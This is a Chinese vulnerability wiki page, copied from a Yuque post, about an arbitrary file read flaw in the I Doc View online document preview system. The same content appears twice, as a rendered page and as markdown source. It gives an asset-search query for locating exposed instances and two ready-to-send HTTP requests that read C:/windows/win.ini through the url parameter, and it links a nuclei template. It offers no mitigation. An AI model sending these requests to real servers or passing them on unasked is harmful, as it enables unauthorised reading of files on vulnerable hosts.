fofamini-wiki

登录白背景

源码

I Doc View在线文档预览系统url存在任意文件读取

一、漏洞简介

I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统，用于在Web环境中展示和预览各种文档类型，如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统url存在任意文件读取。

二、影响版本

I Doc View

三、资产测绘

hunterapp.name="I Doc View"
特征

四、漏洞复现

GET /view/url?url=file:///C:/windows/win.ini HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1

GET /view/zLnusUt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: {hosyname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1

nuclei脚本
i-doc-view-url-文件读取.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/ahkep21wnz44quv4

# I Doc View在线文档预览系统url存在任意文件读取

# 一、漏洞简介
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统，用于在Web环境中展示和预览各种文档类型，如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统url存在任意文件读取。

# 二、影响版本

- I Doc View

# 三、资产测绘

- hunter`app.name="I Doc View"`
- 特征

![image.png](./img/2Yc0GUL8um3_5TlI/1700665332845-edacffd9-0f66-4242-af22-318649c41ae8-589395.png)

# 四、漏洞复现
```
GET /view/url?url=file:///C:/windows/win.ini HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
```
![image.png](./img/2Yc0GUL8um3_5TlI/1702570733104-0c3591b4-f684-4335-99b4-26fa55de3515-812238.png)
```
GET /view/zLnusUt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: {hosyname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
```
![image.png](./img/2Yc0GUL8um3_5TlI/1702570783313-99c21472-a427-4707-853a-7c774aa686f2-556612.png)
nuclei脚本
[i-doc-view-url-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222144497-d80747c0-6115-4dd1-a7aa-2f167f99a4e4.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709222144497-d80747c0-6115-4dd1-a7aa-2f167f99a4e4.yaml%22%2C%22name%22%3A%22i-doc-view-url-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.yaml%22%2C%22size%22%3A1545%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u354ec55b-7767-4ede-88b8-7704db0aa02%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u130c1c59%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ahkep21wnz44quv4>